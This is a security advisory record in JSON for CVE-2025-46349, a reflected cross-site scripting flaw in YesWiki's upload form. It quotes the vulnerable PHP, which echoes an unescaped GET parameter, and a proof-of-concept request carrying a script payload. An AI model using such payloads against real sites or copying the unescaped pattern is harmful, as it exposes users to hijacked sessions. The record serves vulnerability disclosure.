{ "schema_version": "1.4.0", "id": "GHSA-2f8p-qqx2-gwr2", "modified": "2025-04-29T20:27:19Z", "published": "2025-04-29T14:38:12Z", "aliases": [ "CVE-2025-46349" ], "summary": "YesWiki Vulnerable to Unauthenticated Reflected Cross-site Scripting", "details": "### Summary\nReflected XSS has been detected in the file upload form. Vulnerability can be exploited without authentication\n\nThis Proof of Concept has been performed using the followings:\n\n- YesWiki v4.5.3 (doryphore-dev branch)\n- Docker environnment (docker/docker-compose.yml)\n\n### Vulnerable code\nThe vulnerability is located in the [file](https://github.com/YesWiki/yeswiki/blob/6894234bbde6ab168bf4253f9a581bd24bf53766/tools/attach/libs/attach.lib.php#L724-L735)\n```\n public function showUploadForm()\n {\n $this->file = $_GET['file'];\n echo '

' . _t('ATTACH_UPLOAD_FORM_FOR_FILE') . ' ' . $this->file . \"

\\n\";\n echo '
wiki->href('upload', $this->wiki->GetPageTag()) . \"\\\">\\n\"\n . '\twiki->GetPageTag() . \"/upload\\\" />\\n\"\n . '\tattachConfig['max_file_size'] . \"\\\" />\\n\"\n . \"\tfile\\\" />\\n\"\n . \"\t
\\n\"\n . '\t\\n\"\n . \"
\\n\";\n }\n```\n### PoC\n1. You need to send a request to endpoint and abusing the `file` parameter, we can successfully obtain client side javascript execution\n```\nGET /?PagePrincipale/upload&file=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: localhost:8085\nCache-Control: max-age=0\nsec-ch-ua: \"Chromium\";v=\"135\", \"Not-A.Brand\";v=\"8\"\nsec-ch-ua-mobile: ?0\nsec-ch-ua-platform: \"macOS\"\nAccept-Language: ru-RU,ru;q=0.9\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive\n```\n2. Get a response\n\"Снимок\n\n\n### Impact\nThis vulnerability allows any malicious unauthenticated user to create a link that can be clicked on in the victim context to perform arbitrary actions", "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L" } ], "affected": [ { "package": { "ecosystem": "Packagist", "name": "yeswiki/yeswiki" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "4.5.3" } ] } ] } ], "references": [ { "type": "WEB", "url": "https://github.com/YesWiki/yeswiki/security/advisories/GHSA-2f8p-qqx2-gwr2" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46349" }, { "type": "WEB", "url": "https://github.com/YesWiki/yeswiki/pull/1264/commits/6edde40eb7eeb5d60619ac4d1e0a0422d92e9524" }, { "type": "WEB", "url": "https://github.com/YesWiki/yeswiki/commit/0dac9e2fb2a5e69f13a3c9f761ecae6ed9676206" }, { "type": "PACKAGE", "url": "https://github.com/YesWiki/yeswiki" }, { "type": "WEB", "url": "https://github.com/YesWiki/yeswiki/blob/6894234bbde6ab168bf4253f9a581bd24bf53766/tools/attach/libs/attach.lib.php#L724-L735" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2025-04-29T14:38:12Z", "nvd_published_at": "2025-04-29T18:15:44Z" } }